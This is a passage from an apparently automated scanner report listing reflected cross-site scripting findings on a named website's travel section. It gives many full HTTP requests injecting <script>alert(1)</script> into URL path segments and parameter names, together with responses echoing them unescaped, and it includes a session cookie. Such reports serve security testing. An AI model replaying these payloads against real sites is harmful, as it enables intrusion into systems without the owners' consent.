Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccatione880a<script>alert(1)</script>81c0f0d4b4a/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.4863. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 56574<script>alert(1)</script>7f6040704fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes56574<script>alert(1)</script>7f6040704fe/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes56574<script>alert(1)</script>7f6040704fe/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.4864. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27be4<script>alert(1)</script>33a40fe3e26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos27be4<script>alert(1)</script>33a40fe3e26/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos27be4<script>alert(1)</script>33a40fe3e26/images/review/ was not found on this server.</p>
...[SNIP]...

2.4865. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78b88<script>alert(1)</script>bcad9909e63 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images78b88<script>alert(1)</script>bcad9909e63/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images78b88<script>alert(1)</script>bcad9909e63/review/ was not found on this server.</p>
...[SNIP]...

2.4866. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 68f7e<script>alert(1)</script>e60d7e83f09 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/review68f7e<script>alert(1)</script>e60d7e83f09/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review68f7e<script>alert(1)</script>e60d7e83f09/ was not found on this server.</p>
...[SNIP]...

2.4867. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 54c92<script>alert(1)</script>414ca89467 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/review/?54c92<script>alert(1)</script>414ca89467=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review/?54c92<script>alert(1)</script>414ca89467=1 was not found on this server.</p>
...[SNIP]...

2.4868. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ff034<script>alert(1)</script>19dba4bfb10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccationff034<script>alert(1)</script>19dba4bfb10/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccationff034<script>alert(1)</script>19dba4bfb10/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4869. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 98cb9<script>alert(1)</script>ce88a8924a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes98cb9<script>alert(1)</script>ce88a8924a9/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes98cb9<script>alert(1)</script>ce88a8924a9/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4870. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2fcad<script>alert(1)</script>593495b27dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos2fcad<script>alert(1)</script>593495b27dd/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos2fcad<script>alert(1)</script>593495b27dd/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4871. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 72598<script>alert(1)</script>44526bc80fc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images72598<script>alert(1)</script>44526bc80fc/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images72598<script>alert(1)</script>44526bc80fc/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4872. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 29564<script>alert(1)</script>be6d695eac3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/review29564<script>alert(1)</script>be6d695eac3/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review29564<script>alert(1)</script>be6d695eac3/0.gif was not found on this server.</p>
...[SNIP]...

2.4873. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 504c6<script>alert(1)</script>edafe5c10cb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/review/0.gif504c6<script>alert(1)</script>edafe5c10cb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review/0.gif504c6<script>alert(1)</script>edafe5c10cb was not found on this server.</p>
...[SNIP]...

2.4874. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e6efe<script>alert(1)</script>295c55f5bd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/review/0.gif?e6efe<script>alert(1)</script>295c55f5bd4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review/0.gif?e6efe<script>alert(1)</script>295c55f5bd4=1 was not found on this server.</p>
...[SNIP]...

2.4875. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1aa4<script>alert(1)</script>5d5a351e0fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccationf1aa4<script>alert(1)</script>5d5a351e0fe/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccationf1aa4<script>alert(1)</script>5d5a351e0fe/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4876. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c27b9<script>alert(1)</script>93a1868348a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themesc27b9<script>alert(1)</script>93a1868348a/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themesc27b9<script>alert(1)</script>93a1868348a/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4877. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3411e<script>alert(1)</script>5aa0c32cbec was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos3411e<script>alert(1)</script>5aa0c32cbec/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos3411e<script>alert(1)</script>5aa0c32cbec/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4878. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d5a16<script>alert(1)</script>81117ac0502 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/imagesd5a16<script>alert(1)</script>81117ac0502/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/imagesd5a16<script>alert(1)</script>81117ac0502/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4879. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9a511<script>alert(1)</script>94ab8b4f4f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/review9a511<script>alert(1)</script>94ab8b4f4f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review9a511<script>alert(1)</script>94ab8b4f4f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4880. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f8880<script>alert(1)</script>8738e64233f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/review/search.phpf8880<script>alert(1)</script>8738e64233f?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review/search.phpf8880<script>alert(1)</script>8738e64233f?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4881. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

